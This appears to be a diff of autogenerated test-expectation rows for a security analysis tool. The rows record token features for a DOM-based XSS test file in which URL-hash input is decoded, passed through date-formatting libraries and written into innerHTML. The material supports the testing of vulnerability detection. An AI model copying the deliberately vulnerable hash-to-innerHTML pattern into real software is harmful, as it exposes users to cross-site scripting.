autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint = ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint = ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint = ... ing(1)) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint = ... ing(1)) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:9:9:69 | taint = ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:34 | decodeURIComponent | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:34 | decodeURIComponent | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:34 | decodeURIComponent | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:34 | decodeURIComponent | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:34 | decodeURIComponent | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | decodeU ... ing(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | decodeU ... ing(1)) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | decodeU ... ing(1)) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | exceptional return of decodeU ... ing(1)) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | exceptional return of decodeU ... ing(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | exceptional return of decodeU ... ing(1)) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:17:9:69 | exceptional return of decodeU ... ing(1)) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:41 | window | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:41 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:41 | window | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:41 | window | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:41 | window | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:50 | window.location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:50 | window.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:50 | window.location | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:50 | window.location | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:50 | window.location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:55 | window.location.hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:55 | window.location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:55 | window.location.hash | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:55 | window.location.hash | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:55 | window.location.hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:65 | window. ... bstring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:65 | window. ... bstring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:65 | window. ... bstring | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:65 | window. ... bstring | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:65 | window. ... bstring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | exceptional return of window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | exceptional return of window. ... ring(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | exceptional return of window. ... ring(1) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | exceptional return of window. ... ring(1) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | exceptional return of window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | window. ... ring(1) | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | window. ... ring(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | window. ... ring(1) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -12837,6 +96487,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | window. ... ring(1) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | window. ... ring(1) | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:9:36:9:68 | window. ... ring(1) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:43:9:50 | location | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:43:9:50 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:43:9:50 | location | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:43:9:50 | location | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:43:9:50 | location | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:52:9:55 | hash | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:52:9:55 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:52:9:55 | hash | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:52:9:55 | hash | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:52:9:55 | hash | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:9:57:9:65 | substring | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:9:57:9:65 | substring | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:9:57:9:65 | substring | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:9:57:9:65 | substring | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:9:57:9:65 | substring | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:9:67:9:67 | 1 | CalleeFlexibleAccessPath | window.location.hash.substring | | autogenerated/Xss/DomBasedXss/dates.js:9:67:9:67 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:9:67:9:67 | 1 | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | @@ -12844,12 +96509,74 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:9:67:9:67 | 1 | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:9:67:9:67 | 1 | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:9:67:9:67 | 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:70 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:70 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:70 | documen ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:70 | documen ... aint)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:5:11:70 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:14:11:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:14:11:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:14:11:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:14:11:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:14:11:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:19:11:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:19:11:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:19:11:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:19:11:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:19:11:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:11:31:11:70 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:11:31:11:70 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:11:31:11:70 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:11:31:11:70 | `Time i ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:11:31:11:70 | `Time i ... aint)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:11:31:11:70 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:32:11:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:32:11:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:32:11:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:32:11:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:32:11:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:32:11:39 | Time is | stringConcatenatedWith | -endpoint- dateFns.format() | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:48 | dateFns | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:48 | dateFns | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:48 | dateFns | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:48 | dateFns | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:48 | dateFns | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:55 | dateFns.format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:55 | dateFns.format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:55 | dateFns.format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:55 | dateFns.format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:55 | dateFns.format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | dateFns ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | dateFns ... taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | dateFns ... taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | dateFns ... taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | dateFns ... taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | dateFns ... taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | exceptional return of dateFns ... taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | exceptional return of dateFns ... taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:11:42:11:68 | exceptional return of dateFns ... taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint 